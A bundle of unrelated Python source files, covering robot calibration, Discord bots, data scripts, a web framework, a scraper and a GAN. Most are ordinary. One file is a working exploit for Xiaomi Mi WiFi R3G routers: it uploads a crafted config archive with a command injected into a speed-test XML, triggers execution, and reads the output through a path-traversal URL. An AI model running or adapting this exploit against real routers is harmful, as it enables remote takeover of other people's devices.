[p4[0], p4[1]]]
# return [[0.5773763528146585, 0.3842165517841408],
# [0.7855928713464901, 0.37834930053240295],
# [0.76618765321789, -0.02885636412309065],
# [0.5568000497983868, -0.01377416902917198]]
def calibrate_homography():
global H, Hinv
#floor_points = get_floor_reference_points()
img_points = get_img_reference_points()
print(img_points)
#print floor_points
img_points = [[380, 136], [509, 143], [512, 324], [374, 318]]
floor_points = [[0.5725, 0.2465], [0.8125, 0.2465], [0.8125, -0.10], [0.5725, -0.10]]
#print img_points
#print floor_points
input("Enter")
H = homography_floor_to_img(img_points, floor_points)
return H
#I need to send H in string format
def sendPoint(msg, topic):
pub = rospy.Publisher(topic, String, queue_size=10)
if not rospy.is_shutdown():
time.sleep(2)
pub.publish(msg)
def msg_as_string(H):
HtoString=""
Q = np.linalg.inv(H)
HtoString = Q[0,0]
HtoString = HtoString+","+Q[0,1]
HtoString = HtoString+","+Q[0,2]
HtoString = HtoString+","+Q[1,0]
HtoString = HtoString+","+Q[1,1]
HtoString = HtoString+","+Q[1,2]
HtoString = HtoString+","+Q[2,0]
HtoString = HtoString+","+Q[2,1]
HtoString = HtoString+","+Q[2,2]
return HtoString
def calibrate():
initial_setup_baxter()
H = calibrate_homography()
return H
#sendPoint(msg_as_string(H), "calibrate_done")
# position = getObjectPosition()
# #baxter.closeLeftGripper()
# sendPoint(position)
def getZ():
global Z
return Z
if __name__ == '__main__':
calibrate()
|
986,964 | 864ca6c8e3907fdbc13057d8b8ab3e89eb1e37c1 | """
Pincer library
====================
An asynchronous python API wrapper meant to replace discord.py
Copyright Pincer 2021
Full MIT License can be found in `LICENSE` at the project root.
"""
from typing import NamedTuple, Literal, Optional
from pincer.client import Client, Bot
from pincer.commands import command
from pincer.objects import Intents
__package__ = "pincer"
__title__ = "Pincer library"
__description__ = "Discord API wrapper rebuild from scratch."
__author__ = "Sigmanificient, Arthurdw"
__email__ = "contact@pincer.org"
__license__ = "MIT"
from pincer.utils import Choices
ReleaseType = Optional[Literal["alpha", "beta", "candidate", "final", "dev"]]
class VersionInfo(NamedTuple):
"""A Class representing the version of the Pincer library."""
major: int
minor: int
micro: int
release_level: ReleaseType = None
serial: int = 0
def __repr__(self) -> str:
return (
f'{self.major}.{self.minor}.{self.micro}'
+ (
f'-{self.release_level}{self.serial}'
* (self.release_level is not None)
)
)
__version__ = VersionInfo(0, 7, 1)
__all__ = (
"__author__", "__email__", "__package__", "__title__", "__version__",
"Bot", "Client", "command", "Intents", "Choices"
)
|
986,965 | a84e3bd830ce48b9da3c49f4e0013a07cbd20e49 | #!/bin/python
#coding=utf_8
# VERSION: 1.0.0
# Author: Benjamin Delaune Bioinformatic student team 11 CRCINA
# Date : 30/08/17
import sys,os,subprocess,gzip
import functions
#####################################################################################################################################
# Database file creation
#Analysis option must be the first option called
if len(sys.argv) <3:
print ("\n*** Error:Input AND output files must be given ***")
print ("python TAB_modification path/to/input_file path/to/output_file\n")
sys.exit(2)
# Database file recovery
path_in=sys.argv[1]
functions.Exist_file(path_in)
# File out recovery
file_out=sys.argv[2]
# File out path verification
path_out=("/").join(file_out.split("/")[:-1])
functions.Exist_dir(path_out)
path_tmp=path_out+"tmp.tab"
f_out=open(path_tmp,'w')
if ".gz" in (path_in):
f_in=gzip.open(path_in,'r')
else:
f_in=open(path_in,'r')
# Database name recovery
db_name=path_in.split("/")[-1].split("_")[0].split(".")[0]
# For each line in database line
for line in f_in:
if "chromosome" not in line:
col1=line.split("\t")[0]
if len(col1)==4:
if db_name=="REDIportal":
f_out.write(str(col1[-1])+"\t"+str(line.split("\t")[1])+"\t"+str(line.split("\t")[4])+"\n")
elif db_name=="Human":
f_out.write(str(col1[-1])+"\t"+str(line.split("\t")[1])+"\t"+str(line.split("\t")[3])+"\n")
elif len(col1)==5:
if db_name=="REDIportal":
f_out.write(str(col1[-2:])+"\t"+str(line.split("\t")[1])+"\t"+str(line.split("\t")[4])+"\n")
elif db_name=="Human":
f_out.write(str(col1[-2:])+"\t"+str(line.split("\t")[1])+"\t"+str(line.split("\t")[3])+"\n")
else:
if db_name=="REDIportal":
f_out.write(str(line.split("\t")[0])+"\t"+str(line.split("\t")[1])+"\t"+str(line.split("\t")[4])+"\n")
elif db_name=="Human":
f_out.write(str(line.split("\t")[0])+"\t"+str(line.split("\t")[1])+"\t"+str(line.split("\t")[3])+"\n")
f_out.close()
#Sorting positions
cmd = "cat "+path_tmp+ "|sort -k1,1 -k2,2n>"+file_out
cmd1 = "rm "+path_tmp
subprocess.call(cmd,shell=True)
subprocess.call(cmd1,shell=True)
|
986,966 | 18eb02dbf75b6adc5acac8873bca3377d22902b5 | import requests
from .utils import _convert
from .fields import FieldSet, RequestsField, RequestsList
class GrapheneRequests:
__slots__ = ('query', 'json')
def __init__(self, class_, query):
new_query = []
for set_ in query:
required = []
new_query.append(FieldSet(set_.field, set_.args, []))
for i in set_.sub_fields:
obj = class_.__dict__[_convert(i.field)]
if isinstance(obj, (RequestsField, RequestsList)):
for field in obj.required_fields:
required.append(FieldSet(field, {}, []))
else:
if not i in new_query[-1].sub_fields:
new_query[-1].add_sub_field(i)
for required_field in required:
if not required_field in new_query[-1].sub_fields:
new_query[-1].add_sub_field(required_field)
self.query = new_query
def send(self, url):
def to_string(obj): # recursive
str_ = f'{obj.field} '
args = ''
for k, v in obj.args.items():
args += f'{k}: "{v}" ' if isinstance(v, str) else f'{k}: {v} '
if args:
str_ += f'({args})'
sub_fields = ''
for sub_field in obj.sub_fields:
sub_fields += to_string(sub_field)
if sub_fields:
str_ += f' {{{sub_fields}}} '
return str_
string = ''
for i in self.query:
string += to_string(i)
json = {'query': f"{{{string}}}"}
r = requests.post(url, json=json)
assert not 'errors' in r.json(), r.json()['errors']
self.json = r.json()
return self |
986,967 | 38e04a61e95ec8e7e22521c243d07fd53bba9494 | def main():
print('Handling files in this code')
file = open("file.txt")
for text in file:
print(text, end=" ")
if __name__=="__main__": main()
|
986,968 | ab436d99863a1a462d98b8d174e79808f1205805 | # -*- coding: UTF-8 -*-
#############################################
## (C)opyright by Dirk Holtwick, 2008 ##
## All rights reserved ##
#############################################
# import pyxer.helpers as h
# import pyxer.model as model
from webob import exc
# from formencode.htmlfill import render
import sys
import logging
import string
import mimetypes
import imp
import os
import os.path
import types
import urllib
import urlparse
GAE = "google.appengine" in sys.modules
# On stage
if GAE:
STAGE = (
os.environ.get('SERVER_SOFTWARE', '').startswith('Google ') or
os.environ.get('USER', '').startswith('Google ') == 'apphosting')
else:
STAGE = True
stage = STAGE
from pyxer.utils import Dict, AttrDict
from pyxer.utils.jsonhelper import json, json_decode, json_encode
from pyxer.controller import \
Controller, isController, c, g, h, config, \
session, response, request, resp, req
from pyxer.routing import Router, static
from pyxer import helpers
import logging
log = logging.getLogger(__name__)
def url(url, *parts, **params):
" Normalize URL "
if len(parts):
url += "/" + "/".join(parts)
#log.debug("URL (1) %r", url)
url = urlparse.urljoin(request.environ["pyxer.urlbase"], url)
log.debug("URL (2) %r", url)
obj = list(urlparse.urlparse(url))
if params:
query = urllib.urlencode(params)
# url = request.relative_url(url)
obj[4] = query
# If you live behind an Apache proxy
# XXX Maybe has to go in pyxer.app?
#if request.environ.has_key("HTTP_X_FORWARDED_HOST"):
# log.debug("URL (x) %r %r", obj, request.environ["HTTP_X_FORWARDED_HOST"])
# obj[1] = request.environ["HTTP_X_FORWARDED_HOST"]
# if not obj[0]:
# obj[0] = "http"
url = urlparse.urlunparse(obj)
log.debug("URL (3) %r", url)
return url
def redirect(location=None, permanent=False):
" Redirect to other page "
# .exeception for Python 2.3 compatibility
# 307
if location is None:
location = req.environ["PATH_INFO"]
if permanent:
raise exc.HTTPMovedPermanently(location=url(location)).exception
else:
raise exc.HTTPSeeOther(location=url(location)).exception
def abort(code=404):
" Abort with error "
# .exeception for Python 2.3 compatibility
raise exc.HTTPNotFound().exception
notfound = abort
_template_cache = {}
class StreamTemplateManager:
def __init__(self, root):
self.root = root
def load(self, path):
global _template_cache
import pyxer.template as pyxer_template
if not stage:
pyxer_template = reload(pyxer_template)
path = os.path.abspath(os.path.join(self.root, path))
# Test if it is in cache and return if found
mtime = os.path.getmtime(path)
if stage and _template_cache.has_key(path):
log.debug("Template fetching from cache")
template, last = _template_cache.get(path)
if mtime <= last:
log.debug("Template fetched from cache")
return template
else:
log.debug("Found a newer file than the one in the cache for %r", path)
# Load the template
log.debug("Loading template %r in StreamTemplateManager", path)
data = file(path, "r").read().lstrip()
template = pyxer_template.TemplateSoup(
data,
xml=data.startswith('<?xml'))
template.load = self.load
_template_cache[path] = (template, mtime)
return template
def template_stream(name=None):
" Get the template "
# XXX What to do with dirname? Scenarios?
# XXX What to do with absolute url /like/this?
if name is not None:
path = os.path.join(request.urlvars["pyxer.path"], name)
dirname = os.path.dirname(path)
else:
path = request.template_url
dirname = os.path.dirname(path)
log.debug("Loading template %r", path)
soup_manager = StreamTemplateManager(dirname)
return soup_manager.load(path)
template = template_default = template_stream
def render_stream(template=None, **kw):
template = template_stream(name=template)
template.generate(Dict(c=c, h=Dict(
url=url,
redirect=redirect,
strftime=helpers.strftime,
stage=STAGE,
), load=template.load))
# logging.info("CT %r", )
if response.headers['Content-Type'] == 'text/html; charset=utf8':
response.headers['Content-Type'] = 'text/html; charset=%s' % kw.get("encoding", "utf-8")
return template.render(**kw)
render_default = render_stream
def render_json(**kw):
" Render output as JSON object "
if 'ext' in kw:
if kw['ext']:
# XXX We need to implement output by extension e.g.
# file names ending on .json, .yaml, .xml, .rss, .atom
pass
response.headers['Content-Type'] = 'application/json; charset=%s' % kw.get("encoding", "utf-8")
result = json(request.result)
# log.debug("JSON: %r", result)
return result
def render(result=None, render=None, **kw):
log.debug("Render called with %r %r %r", repr(result)[:40], render, kw)
# log.debug("Render called with %r %r", render, kw)
# log.debug("Response %r %r", response.body_file, response.body)
# Choose a renderer
render_func = None
# Render is explicitly defined by @controller
if render is not None:
render_func = render
# If the result is None (same as no return in function at all)
# then apply the corresponding template
# XXX Maybe better test if response.body/body_file is also empty
elif result is None:
render_func = render_default
# Consider dict and list as JSON data
elif isinstance(result, dict) or isinstance(result, list):
render_func = render_json
# Execute render function
log.debug("Render func %r", render_func)
if render_func is not None:
request.result = result
log.debug("Render with func %r", render_func)
result = render_func(**kw)
# Normalize output
# if (not None) and (not isinstance(result, str)) and (not isinstance(result, str)):
# result = str(result)
# Publish result
if isinstance(result, unicode):
response.charset = 'utf-8'
response.unicode_body = result
elif isinstance(result, str):
response.body = result
return response.body
_render = render
class controller(Controller):
def render(self, result, render=None, **kw):
if response.body:
log.debug("Render: Body is already present")
return response.body
return _render(result, render, **kw)
class expose(controller):
def call(self, *a, **kw):
" Add arguments "
data = {}
for k, v in dict(request.urlvars).items():
if not (k.startswith("pyxer.") or k in ("controller", "module")):
data[k] = v
request.charset = 'utf8'
for k,v in request.params.items():
data[str(k)] = v
# data.update(dict(request.params))
# log.debug("Call func with params %r and urlvars %r", dict(request.params), dict(request.urlvars))
return self.func(**data)
class Permission(object):
"""
XXX
@controller(permission=Permission('read'))
"""
def __init__(self, permission):
self.permission
def __call__(self, permissions):
if isinstance(permissions, basestring):
permissions = [permissions]
return self.permission in permissions
|
986,969 | c49a0b610b533d4701d065f5dc281ede3c4eb0cf | # -*- coding: utf-8 -*-
from util import spider_util
from bs4 import BeautifulSoup
import json
import demjson
from pandas import DataFrame
from util import coordinate_util
def areaSnatch():
"""
抓取小学学区图位置信息
:return:
"""
# 小学学区
datas = []
primaryschool_url = 'http://map.28dat.net/inc/ftxx.js'
data = spider_util.open_url(primaryschool_url).decode()
start = data.find('return')
end = data.find('];')
data = data[start + 6:end + 1] # 获取其中坐标信息
primaryschool_area = demjson.decode(data)
coordinate_handle(primaryschool_area, '小学')
# 初中学区
middleschool_url = 'http://map.28dat.net/inc/ftcz.js'
data = spider_util.open_url(middleschool_url).decode()
start = data.find('return')
end = data.find('];')
data = data[start + 6:end + 1] # 获取其中坐标信息
middleschool_area = demjson.decode(data)
coordinate_handle(middleschool_area, '初中')
datas.extend(primaryschool_area)
datas.extend(middleschool_area)
return datas
def requset_school_info(areas):
schoolnames = []
infourl_prefix = 'http://map.28dat.net/s_ft/school.aspx?no='
for school in areas:
print(school)
schoolnames.append(school['name'])
resulet = spider_util.open_url(infourl_prefix + '1' + school['no'])
bsObj = BeautifulSoup(resulet, "html.parser", from_encoding="utf-8")
text = bsObj.select_one('#s_desc').get_text()
print(text)
print(schoolnames)
def coordinate_handle(areas, schooltype: int):
"""
学区信息解析处理
:param schooltype:
:param areas:
:return:
"""
for school in areas:
point = school['point'] # 百度坐标字符串
bd_lon, bd_lat = coordinate_util.try_convert_float(*tuple(point.split(',')))
lon_84, lat_84 = tuple(coordinate_util.bd09towgs84(bd_lon, bd_lat))
school['bd_lon'] = bd_lon
school['bd_lat'] = bd_lat
school['lon_84'] = lon_84
school['lat_84'] = lat_84
school['schooltype'] = schooltype
if school['name'] == '水围小学':
school[
'polygon'] = '114.0633,22.534045;114.0634,22.52855;114.0628,22.521258;114.067507,22.521794;114.070507,' \
'22.522794;114.072412,22.524113;114.074029,22.525699;114.0746,22.527468;114.0746,' \
'22.5288;114.07106,22.5287;114.069627,22.5342 '
if school['name'] == '皇岗中学':
school['polygon'] = '114.06335630432059,22.53407055006403;114.0633570352742,' \
'22.52892505079072;114.06346863640744,22.528256298155046;114.06333038826526,' \
'22.526891409780625;114.06318181142706,22.5246178427583;114.0630325230082,' \
'22.522394809728347;114.0629434046132,22.521333587742063;114.06877342108848,' \
'22.522389967130895;114.07232486225952,22.524357038565782;114.0730238399688,' \
'22.524157289190093;114.07402998731851,22.523322509788134;114.07466511847029,' \
'22.52267052672166;114.0759830451113,22.520432070153596;114.08186917875757,' \
'22.52170881191117;114.08102355412635,22.524914183231346;114.08252321508871,' \
'22.52897097054742;114.07943882066171,22.52999201450642;114.07946277559604,' \
'22.532391529886656;114.07942632794372,22.53438421673346;114.06335630432059,' \
'22.53407055006403 '
if school['name'] == '福田外国语学校南校区初中部(暂定名)':
school['polygon'] = '114.0629360257067,22.520920473399144;114.0625158974266,' \
'22.519362397148825;114.06309218401087,22.516947467537996;114.06331627482768,' \
'22.515890636312466;114.06516390653805,22.50671939281994;114.0676961580645,' \
'22.508769379251227;114.06818119507018,22.513321296078516;114.06972362173309,' \
'22.515887848366944;114.07575038062822,22.52053043740426;114.0744486351297,' \
'22.522618348565825;114.07362632561198,22.52301515156071;114.07263319972233,' \
'22.523825098839897;114.0708162964302,22.522876576538774;114.06798413768293,' \
'22.521646582687115;114.06289448830186,22.520957749246804;114.0629360257067,' \
'22.520920473399144 '
polygon = school['polygon']
if not polygon:
school['polygon_84'] = None
continue
points_in_polygon_list = polygon.split(';')
points_wgs84 = []
for point_bd in points_in_polygon_list:
if point_bd is None or point_bd == '':
continue
lon, lat = tuple(coordinate_util.try_convert_float(*point_bd.split(',')))
data = coordinate_util.bd09towgs84(lon, lat)
point_wgs84 = ','.join(str(s) for s in data if s)
points_wgs84.append(point_wgs84)
points_wgs84.append(points_wgs84[0]) # 为了保证头尾相连,添加第一个坐标到末尾
polygon_wgs84_str = ';'.join(points_wgs84) # 拼接转换坐标系后的学区范围坐标
school['polygon_84'] = polygon_wgs84_str
def main():
datas = areaSnatch()
DataFrame(datas).to_excel('D:\\pypy\\pythonresult\\edu\\学区信息.xls', index=False)
DataFrame(datas).to_json('D:\\pypy\\pythonresult\\edu\\学区信息.json', orient='records', force_ascii=False)
if __name__ == '__main__':
main()
|
986,970 | 20fdba5455acba89837283590aba51913b46b77c | #!/usr/bin/env
# -*- coding:utf-8 -*-
"""
Derive Pi by Monte Carlo method
version 1
I am gonna use nulti-threading.
- Sam Sun <sunjunjian@gmail.com>, 2012
"""
import random
import time
import threading
import io
# import timeit
class Counter:
def __init__(self):
self.total_number = 0
self.inside_number = 0
self.mcpi = 0
def reset(self):
self.total_number = 0
self.inside_number = 0
self.mcpi = 0
def add(self, total, inside):
self.total_number += total
self.inside_number += inside
def getPi(self):
if self.total_number != 0:
self.mcpi = 4 * (float(self.inside_number) / float(self.total_number))
else:
self.mcpi = 0
return self.mcpi
def display(self):
print 'Monte Carlo Pi is : ', self.getPi()
def worker(num_loops, cnt):
""" The worker, invoked in a manager.
'num_loops' - the number of loops we want to perform the Monte Carlo
simulations, with unit in thousand.
'cnt' - the object where we store the counters.
"""
global mutex
for i in range(num_loops):
total = 0
inside =0
for j in range(1000):
x = random.random()
y = random.random()
if (x*x + y*y) <= 1:
inside += 1
total += 1
mutex.acquire()
cnt.add(total, inside)
mutex.release()
def manager(num_thrds, num_loops):
""" The manager function spawns workers.
'num_thrds' - the number of workers.
'num_loops' - the number of loops we want to perform the Monte Carlo
simulations, with unit in thousand.
"""
mutex.acquire()
cnt.reset()
mutex.release()
# initialize the thread pool
thread_pool = []
for i in range(num_thrds):
thrd = threading.Thread(target=worker, args=(num_loops, cnt))
thread_pool.append(thrd)
# start threads
for i in range(len(thread_pool)):
thread_pool[i].start()
for i in range(len(thread_pool)):
threading.Thread.join(thread_pool[i])
#cnt.display()
if __name__ == "__main__":
global mutex
# initialize the mutex
mutex = threading.Lock()
# initialize the result Counter
cnt = Counter()
# number of threads to be used
num_thrds = 4
# LCM is used to distribute workload among workers
LCM = 840
# output
lines = []
for i in range(1,num_thrds + 1):
start = time.time()
manager(i, LCM/i)
elapsed = (time.time() - start)
# need to make sure lines are Unicode chars
lines.append(repr(cnt.getPi()) + u',' + repr(i) + u',' + repr(LCM * 1000) + u',' + repr(elapsed) + u'\n')
with io.open('python.out', 'w') as file:
# writelines method only takes Unicode (no string)
file.writelines(lines)
|
986,971 | e83e7730ed9f4b12d05dec35ed9bcf2498a3ce61 | from collections import OrderedDict
from typing import Union, Mapping, Dict
class Headers(OrderedDict):
@classmethod
def from_bytes(cls, b: bytes):
if b'\r\n\r\n' in b:
b = b[:b.find(b'\r\n\r\n')]
headers: Dict[str, Union[str, int]] = Headers()
for line in b.split(b'\r\n'):
if b':' in line:
header, *value = line.split(b':', maxsplit=1)
if not value:
continue
header_str, value_str = \
header.decode().strip(), value[0].decode().strip()
if header_str in headers.keys():
# Multiple message-header fields
# Accoring to RFC 2616
headers[header_str] = \
str(headers[header_str]) + ',' + value_str
elif value_str.isdigit():
value_int = int(value_str)
headers[header_str] = value_int
else:
headers[header_str] = value_str
return headers
def to_str(self):
s = '\r\n'.join(
[
f'{key}: {value}'
for key, value in self.items()
]
)
s += '\r\n\r\n'
return s
def to_bytes(self):
return self.to_str().encode()
def __bool__(self):
return bool(self.headers)
def __repr__(self):
return f'{self.__class__.__name__}({self.headers})'
def __init__(self, headers: Mapping = dict()):
for key, value in headers.items():
self[key] = value
|
986,972 | 850d02bbf7d3fffcb1dbb60fbb6dae0daec46bb3 | from rest_framework import routers
from .viewsets import ToDoViewSet
router = routers.DefaultRouter()
router.register('todo', ToDoViewSet, basename='todo')
|
986,973 | 73fc6d860bf293d4dfaeeadae0a0ba754832f966 | import os
APIARY_URL = os.environ['APIARY_URL']
KEY = os.environ['OPS_KEY']
SECRET = os.environ['OPS_SECRET']
|
986,974 | 3ffb072f7d70402025aa628a437c6cf5c9d85c0b | # based on the idea from
# https://github.com/andsens/bootstrap-vz/blob/5250f8233215f6f2e3a571be2f5cf3e09accd4b6/docs/transform_github_links.py
#
# Copyright 2013-2014 Anders Ingemann <anders@ingemann.de>
# Copyright 2016 Darragh Bailey <dbailey@hpe.com>
from docutils import nodes
import os.path
def transform_github_links(app, doctree, fromdocname):
"""Convert file references for github to correct target
Scans the doctree for links directly referencing ReSTructured
text documents within this repository. It converts these links
to a suitable target for sphinx generated docs.
Such references as <file>.rst are used by source code hosting
sites such as GitHub when rendering documents directly from
individual source files without parsing the entire doctree.
However referencing the original <file>.rst is not useful for
sphinx generated documentation as <file>.rst will not exist in
the resulting documentation as it will also have been converted
to the chosen format e.g. <file>.html
Supporting automatic conversion ensures that GitHub/BitBucket
and any other git hosting site performing rendering on a file
by file basis allowing users to navigate through the documentation,
while still ensuring the output from fully generated sphinx docs
will point to the correct target.
"""
try:
target_format = app.builder.link_suffix
except AttributeError:
# if the builder has no link_suffix, then no need to modify
# the current links.
return
source_suffix = app.config.source_suffix
# Links are either absolute against the repository or relative to
# the current document's directory. Note that this is not
# necessarily app.srcdir, which is the documentation root
# directory. Instead rely on 'source' attribute of doctree to
# identify the path of the file providing the current doctree
try:
doc_path = doctree.attributes['source']
doc_dir = os.path.dirname(doc_path)
except KeyError:
# some doctrees added by other libraries through dynamic
# generation do not have a source file. Assume paths are
# relative to the repo.
doc_dir = ""
for node in doctree.traverse(nodes.reference):
if 'refuri' not in node:
continue
if node['refuri'].startswith('http'):
continue
try:
link, anchor = node['refuri'].split('#', 1)
anchor = '#' + anchor
except ValueError:
link = node['refuri']
anchor = ''
if link is None:
continue
# Replace the suffix with the correct target format file ending,
# but only if the link ends with both the correct source suffix
# and refers to a local file.
for src_suffix in source_suffix:
if link.endswith(src_suffix):
# absolute paths are considered relative to repo
if link.startswith("/"):
basepath = ""
# relative paths are against the current doctree source path
else:
basepath = doc_dir
if os.path.exists(os.path.join(basepath, link)):
node['refuri'] = (link[:-len(source_suffix)] + target_format +
anchor)
def setup(app):
app.connect('doctree-resolved', transform_github_links)
return {'version': '0.1'}
|
986,975 | 47dfe408c7ad29758b4a3839e28fab22262b3cbf | # Sample Bar Graph- Generates A Bar Graph Of Sample Data
import matplotlib.pyplot as plt # Import Matplotlib
import numpy as np # Import Numpy
# Plotting Data
schl_names = ("Ravenna HS", "Theodore Roosevelt HS", "Hoover HS", "McKinley HS", "Stow-Munroe Falls HS")
population = [930, 1300, 1700, 900, 2000] # Population of schools
x_values = np.arange(len(schl_names)) # Arrange - Evenly spaced bars
def bar_graph (): # Generates a line graph of sample data
plt.bar (x_values, population, align = 'center', color = '#a93226') # Align - Alignment of bars
plt.xticks (x_values, schl_names, fontsize = 7)
plt.title ("Population Of Schools") # Sets Title
plt.show()
bar_graph ()
|
986,976 | b4a823f1ae7a798b24a8c3d78b7b0cc0e7c612fa | # Generated by Django 2.0.5 on 2020-02-25 06:13
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('plus', '0060_auto_20200224_1449'),
]
operations = [
migrations.AlterField(
model_name='plusplans',
name='priority',
field=models.PositiveIntegerField(blank=True, default=0, null=True),
),
]
|
986,977 | b888cb5cdf7db25ba7056eed2d2f640088b3312c | from quantdsl.semantics import Add, Choice, Fixing, Market, Min, Mult, Wait, inline
def PowerPlant(start, end, commodity, cold, step):
if (start < end):
Wait(start, Choice(
Add(
PowerPlant(start + step, end, commodity, Running(), step),
ProfitFromRunning(start, commodity, cold)
),
PowerPlant(start + step, end, commodity, Stopped(cold), step),
))
else:
return 0
@inline
def Running():
return 0
@inline
def Stopped(cold):
return Min(2, cold + 1)
@inline
def ProfitFromRunning(start, commodity, cold):
return Mult((1 - cold / 10), Fixing(start, Burn(commodity)))
@inline
def Burn(commodity):
return Market(commodity)
|
986,978 | 84e18900d8cd5f4cffbf23762d15d4a5ec5380ef | from flask import render_template
from . import scores
from . import spec
def configure(config, bp, score_processor):
@bp.route("/v1/", methods=["GET"])
def v1_index():
return render_template("swagger-ui.html", swagger_spec="/v1/spec/")
bp = scores.configure(config, bp, score_processor)
bp = spec.configure(config, bp, score_processor)
return bp
|
986,979 | 6583c727754f9b23992aa399baf774c5fd8c3d55 | #Discord
import discord
from discord.ext import commands
import pandas as pd
import random
#Token
from tokens import token
# Client
client = commands.Bot(command_prefix='%')
#Functions
#Commands
@client.command(name='version')
async def version(context):
emb=discord.Embed(title="Current Version", description="Version of the bot is 1.0", color=0x00ff00)
emb.add_field(name="Version Code:", value="v1.0.1", inline=False)
emb.add_field(name="Date Released:", value="20/02/21", inline=False)
emb.set_footer(text="Version")
emb.set_author(name="Ruben Romero")
await context.message.channel.send(embed=emb)
@client.command(name='kick', pass_context=True)
@commands.has_permissions(kick_members=True)
async def kick(context, member: discord.Member):
await member.kick()
await context.send('User '+member.display_name+ 'has been kicked')
@client.command(name='ban', pass_context=True)
@commands.has_permissions(kick_members=True)
async def ban(context, member: discord.Member, *, reason=None):
await member.ban()
await context.send('User '+member.display_name+ 'has been banned')
@client.command(name='dm')
async def dm(context):
await context.message.author.send("Hi! Did you ask for a DM?")
#myID=686620827717730384
#await context.message.channel.send(context.message.author.id)
#if(context.message.author.id==myID):
#else:
# await context.message.author.send("U are not an Admin")
@client.command(name='img')
async def img(context):
await context.channel.send(file=discord.File("InosukeBot/santiago.jpeg"))
#Events
@client.event
async def on_ready():
configChanID=812579716161994802
configChan=client.get_channel(configChanID)
await configChan.send('Hola zorras!')
await client.change_presence(status=discord.Status.do_not_disturb, activity=discord.Game('Fcking around'))
#df = pd.DataFrame({"A":['Hello','Test']})
#df.to_csv('C:/Users/ruben/Documents/Inosuke Bot/InosukeBot/data.csv')
@client.event
async def on_message(message):
if message.author.id==725560073266659351:
await message.channel.send(file=discord.File("InosukeBot/santiago.jpeg"))
if message.content == 'Append':
df = pd.read_csv('C:/Users/ruben/Documents/Inosuke Bot/InosukeBot/data.csv',index_col=0)
df=df.append({"A": 'New message to append'}, ignore_index=True)
df.to_csv('C:/Users/ruben/Documents/Inosuke Bot/InosukeBot/data.csv')
await client.process_commands(message)
@client.event
async def on_disconnect():
configChanID=812579716161994802
configChan=client.get_channel(configChanID)
await configChan.send('Aios perras')
#Run client
client.run(token)
|
986,980 | 55a84f1d21f7d28e740083b94bc878c391e166df | #!/usr/bin/python
# There is a remote command execution vulnerability in Xiaomi Mi WiFi R3G before version stable 2.28.23.
# The backup file is in tar.gz format. After uploading, the application uses the tar zxf command to decompress,
# so you can control the contents of the files in the decompressed directory.
# In addition, the application's sh script for testing upload and download speeds will read the url list from /tmp/speedtest_urls.xml,
# and there is a command injection vulnerability.
# discoverer: UltramanGaia from Kap0k & Zhiniang Peng from Qihoo 360 Core Security
import os
import tarfile
import requests
# proxies = {"http":"http://127.0.0.1:8080"}
proxies = {}
## get stok
stok = input("stok: ")
## make config file
command = input("command: ")
speed_test_filename = "speedtest_urls.xml"
with open("template.xml","rt") as f:
template = f.read()
data = template.format(command=command)
# print(data)
with open("speedtest_urls.xml",'wt') as f:
f.write(data)
with tarfile.open("payload.tar.gz", "w:gz") as tar:
# tar.add("cfg_backup.des")
# tar.add("cfg_backup.mbu")
tar.add("speedtest_urls.xml")
## upload config file
print("start uploading config file ...")
r1 = requests.post("http://192.168.31.1/cgi-bin/luci/;stok={}/api/misystem/c_upload".format(stok), files={"image":open("payload.tar.gz",'rb')}, proxies=proxies)
# print(r1.text)
## exec download speed test, exec command
print("start exec command...")
r2 = requests.get("http://192.168.31.1/cgi-bin/luci/;stok={}/api/xqnetdetect/netspeed".format(stok), proxies=proxies)
# print(r2.text)
## read result file
r3 = requests.get("http://192.168.31.1/api-third-party/download/extdisks../tmp/1.txt", proxies=proxies)
if r3.status_code == 200:
print("success, vul")
print(r3.text)
|
986,981 | 2f8065ac849e3d7e96e7fb2616f5a0163f69fa63 | import matplotlib.pyplot as plt
import torch
from torch import nn
import torch.nn.functional as F
# define the class for the CNN-classifier
class CNN(nn.Module):
def __init__(self):
super(CNN, self).__init__()
self.conv1 = nn.Sequential( # input shape: (batch_size, 1, 28, 28)
nn.Conv2d(1, 16, 5, 1, 2), # shape: (batch_size, 16, 28, 28)
nn.ReLU(),
nn.MaxPool2d(2), # shape: (batch_size, 16, 14, 14)
#nn.Dropout(p=pDropout),
)
self.conv2 = nn.Sequential(
nn.Conv2d(16, 32, 5, 1, 2), # shape: (batch_size, 32, 14, 14)
nn.ReLU(),
nn.MaxPool2d(2), # shape: (batch_size, 32, 7, 7)
#nn.Dropout(p=pDropout),
)
self.out = nn.Sequential( # fully connected layer, output 10 classes
nn.Linear(32 * 7 * 7, 10),
)
def forward(self, x):
x = self.conv1(x)
x = self.conv2(x)
x = x.view(x.size(0), -1) # flatten the output of conv2 to (batch_size, 32 * 7 * 7)
output = self.out(x)
return output
# choose CNN-classifier-model:
trained_Classifier = "trained models/CNN-Classifier_MNIST.pth" # test accuracy: 99.11%
#trained_Classifier = "trained models/CNN-Classifier_FashionMNIST.pth" # test accuracy: 89.96%
C = torch.load(trained_Classifier)
# load cGAN
# Hyperparameters:
label_knots = 64 # number of knots the label gets mapped to in both G and D
G_in_eval = False # if G is set to eval mode during inference
uniform_input = False # if the random input is sampled from a uniform distribution, if True: normal distribution
G_noise = 0 # add noise to G layers, has to be commented in in the rest of the code
# fixed Hyperparameters
batch_size = 100
pDropout = 0.5 # Dropout percentage
scale = 0.2 # scale for leaky ReLU
pic_knots = 512 - label_knots
# define the class for the Generator
class Gen(nn.Module):
def __init__(self):
super(Gen, self).__init__()
self.fc1_1 = nn.Linear(100, pic_knots)
self.fc1_1_bn = nn.BatchNorm1d(pic_knots)
self.fc1_2 = nn.Linear(10, label_knots)
self.fc1_2_bn = nn.BatchNorm1d(label_knots)
self.dropout1 = nn.Dropout(p=pDropout)
self.fc2 = nn.Linear(512, 512)
self.fc2_bn = nn.BatchNorm1d(512)
self.dropout2 = nn.Dropout(p=pDropout)
self.fc3 = nn.Linear(512, 784)
self.fc3_bn = nn.BatchNorm1d(784)
def forward(self, input, label):
x1 = F.leaky_relu(self.fc1_1_bn(self.fc1_1(input)), negative_slope=scale)
x2 = F.leaky_relu(self.fc1_2_bn(self.fc1_2(label)), negative_slope=scale)
x = torch.cat([x1, x2], 1)
#x = x + G_noise * torch.randn(1, 512, dtype=torch.float) # additional random noise
x = self.dropout1(x)
#x = F.dropout(x, pDropout)
x = F.leaky_relu(self.fc2_bn(self.fc2(x)), negative_slope=scale)
#x = x + G_noise * torch.randn(1, 512, dtype=torch.float) # additional random noise
